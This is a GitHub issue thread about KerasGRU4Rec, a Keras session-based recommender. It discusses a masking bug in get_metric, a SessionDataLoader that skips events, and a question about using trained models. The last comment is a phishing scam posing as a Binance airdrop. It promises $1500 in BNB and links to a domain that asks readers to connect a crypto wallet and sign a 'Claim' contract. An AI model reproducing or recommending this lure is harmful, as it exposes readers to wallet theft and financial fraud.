### ISSUE TITLE
KerasGRU4Rec does not process on all possible events

### ISSUE THREAD

**Issue by htran20** [paxcema/KerasGRU4Rec#6]
Thanks for the implementation of Keras gru4rec.
I notify some issues in your code:
1. The get_metric function does not take use of mask variable to reset the state after each session, thus the evaluation results may be wrong.
2. Issue with SessionDataLoader. Since every session is varied in length, all the remaining events in the last batch_size sessions will not be processed as soon as one of this session finishes (while loop stops when maxiter >= len(click_offsets) - 1 but maxiter starts from max(batch_size), apparently we did not process all events). You can confirm it by comparing the number of generated feat with (the number of events - the number of unique session).
This can affect the evaluation result where number of batch_size is large and number of unique session is small. One potential fix is to use zero masking.

**Comment by paxcema** [comment]
Hi there @htran20, thanks for reporting this!

1. The issue has been addressed, see #8.
2. I will take a look at this in the following weeks. Feel free to propose a PR with the fix, though.

**Comment by paxcema** [comment]
Hey there @shinsenter! 

I haven't looked into (2), nor evaluated the potential impact on evaluation metrics. Your comment has been a good reminder of this issue. I'll try to address it in the coming weeks, but no promises. 

If you want to take a stab at it, I'd also be happy to review any pull requests :+1:

**Comment by shinsenter** [comment]
@paxcema thank you for giving a schedule.
btw, I has completed training my models using your setup, but I am not sure how can I use the h5 files for a recommender system. Can I receive some advices?

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
